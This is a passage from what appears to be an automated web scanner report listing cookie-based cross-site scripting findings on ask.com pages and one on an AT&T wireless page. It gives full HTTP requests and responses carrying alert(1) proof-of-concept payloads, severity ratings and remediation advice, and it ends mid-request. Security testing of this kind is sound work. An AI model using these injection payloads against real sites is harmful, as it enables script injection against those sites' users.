Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllPwpcQDkAACJXhwoAAAD4
from-tr: trafrt009iad.io.askjeeves.info
Content-Length: 115762
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:15 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjE1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:15 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
<img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=p&app=a14&l=dir&o=0&sv=0a5c4079&p=pictures&rf=0&ord=3785001&cu.wz=0b9561"><script>alert(1)</script>e8deaf81c4c" height=1 width=1 id="SessionTracker" />
...[SNIP]...

1.116. http://www.ask.com/pictures [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23d5a"-alert(1)-"23acc03a791 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pictures?o=0&l=dir&qsrc=167&q=xss&v=14 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=023d5a"-alert(1)-"23acc03a791; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllQQpcQDcAAAZV8RoAAAAm
from-tr: trafrt007iad.io.askjeeves.info
Content-Length: 115582
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:17 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjE3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:17 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
Image();
st.height = 1;
st.width = 1;
st.id = "SessionTracker";
st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=p&app=a14&l=dir&o=0&sv=0a5c407a&p=pictures&rf=0&ord=3913624&cu.wz=023d5a"-alert(1)-"23acc03a791";


</script>
...[SNIP]...

1.117. http://www.ask.com/products/display [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /products/display

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ae25"-alert(1)-"eb8fc402c26 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/display HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=07ae25"-alert(1)-"eb8fc402c26; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjUxLVVUQw%3D%3D&po=0&pp=dir; qc=0; wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllPQpcQW8AAHONb-gAAADu
from-tr: trafrt001iad.io.askjeeves.info
Content-Length: 39783
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:13 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjEzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:13 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>Advertise - Ask.com</title>


<link href="http://www.ask
...[SNIP]...

WZInfo.pickRedirectDefault = "http://wzus1.ask.com/r?t=p&d=us&s=a&c=adv&app=aoth&l=dir&o=0&sv=0a5c4050&ip=32177b6a&id=CE5A46FFC89898B9F85CCE078C5D5F15&q=&p=0&qs=121&ac=24&g=2b4aqrWUTiqv21&cu.wz=07ae25"-alert(1)-"eb8fc402c26";
WZInfo.pickDefault = "http://wzus1.ask.com/i/b.html?t=p&d=us&s=a&c=adv&app=aoth&l=dir&o=0&sv=0a5c4050&ip=32177b6a&id=CE5A46FFC89898B9F85CCE078C5D5F15&q=&p=0&qs=121&ac=24&g=2b4aqrWUTiqv21&cu.wz=
...[SNIP]...

1.118. http://www.ask.com/settings [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /settings

Issue detail

The value of the cu.wz cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4aa2"><script>alert(1)</script>6e7e4b15f97 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /settings HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0d4aa2"><script>alert(1)</script>6e7e4b15f97; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllSgpcQW8AAHONd08AAADy
from-tr: trafrt001iad.io.askjeeves.info
Cache-Control: no-cache
Content-Length: 65578
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:26 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjI2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:26 GMT; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
<img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=h&app=aoth&l=dir&o=0&sv=0a5c407d&p=settings&rf=0&ord=4899875&cu.wz=0d4aa2"><script>alert(1)</script>6e7e4b15f97" height=1 width=1 id="SessionTracker" />
...[SNIP]...

1.119. http://www.ask.com/settings [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /settings

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81bfd"-alert(1)-"d4d6009d874 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /settings HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=081bfd"-alert(1)-"d4d6009d874; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllSwpcQDkAACJXjYUAAAD@
from-tr: trafrt009iad.io.askjeeves.info
Content-Length: 65458
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:27 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjI3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:27 GMT; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
mage();
st.height = 1;
st.width = 1;
st.id = "SessionTracker";
st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=h&app=aoth&l=dir&o=0&sv=0a5c404f&p=settings&rf=0&ord=4939452&cu.wz=081bfd"-alert(1)-"d4d6009d874";


</script>
...[SNIP]...

1.120. http://www.ask.com/web [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

The value of the cu.wz cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dc8a"><script>alert(1)</script>01fc5f08645 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /web?q=xss&search=&qsrc=0&o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=04dc8a"><script>alert(1)</script>01fc5f08645; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjAyLVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.1.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_uid=0A42E34A946D4254193520127E77B26A; wz_sid=084EE34C926D4254193520127E77B26A; wz_scnt=1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklkvgpcQDgAACSm0SYAAADA
from-tr: trafrt008iad.io.askjeeves.info
Content-Length: 109937
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:07 GMT
Connection: close
Set-Cookie: gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:26:07 GMT; Path=/
Set-Cookie: clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:26:07 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-eHNz; Domain=.ask.com; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:26:07 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - W
...[SNIP]...
<img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=a&app=a14&l=dir&o=0&sv=0a5c407b&p=web&rf=0&ord=2983056&cu.wz=04dc8a"><script>alert(1)</script>01fc5f08645" height=1 width=1 id="SessionTracker" />
...[SNIP]...

1.121. http://www.ask.com/web [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2e0a"-alert(1)-"b5e3a9ba348 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web?q=xss&search=&qsrc=0&o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0d2e0a"-alert(1)-"b5e3a9ba348; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjAyLVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.1.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_uid=0A42E34A946D4254193520127E77B26A; wz_sid=084EE34C926D4254193520127E77B26A; wz_scnt=1

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TklkwgpcQKMAAFY@ZiAAAAEO
from-tr: trafrt011iad.io.askjeeves.info
Cache-Control: private
Content-Length: 110383
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:11 GMT
Connection: close
Set-Cookie: gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:26:11 GMT; Path=/
Set-Cookie: clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:26:11 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-eHNz; Domain=.ask.com; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:26:11 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - W
...[SNIP]...
new Image();
st.height = 1;
st.width = 1;
st.id = "SessionTracker";
st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=a&app=a14&l=dir&o=0&sv=0a5c4072&p=web&rf=0&ord=3259623&cu.wz=0d2e0a"-alert(1)-"b5e3a9ba348";


</script>
...[SNIP]...

1.122. http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp [B2CSESSIONID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/windows-packages.jsp

Issue detail

The value of the B2CSESSIONID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8415</script><a>c26c8c4bf0d was submitted in the B2CSESSIONID cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cell-phone-service/packages/windows-packages.jsp HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.2.10.1313431966; TLTHID=334FB54EC76B10C7B47BF82B0BF36CDD; TLTSID=31A640C8C76B10C7A09DCAEB2DFC8A0E; B2CSESSIONID=1fKdTJjTTvqPt1!1142544054a8415</script><a>c26c8c4bf0d; DYN_USER_ID=4148005476; DYN_USER_CONFIRM=d958665c301d296eb3ee49e91430ee35; BIGipServerpWL_7010_7011=3989950855.25115.0000; wtAka=y; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001693504923%22%2C%22poc_login%22%3A%22no%22%2C%22bus_support%22%3A%22no%22%2C%22ufix%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22015A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221313432472549_500300%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Ffree-packages.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d9%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A9%2C%22sd%22%3A9%7D; __utmc=241758596; 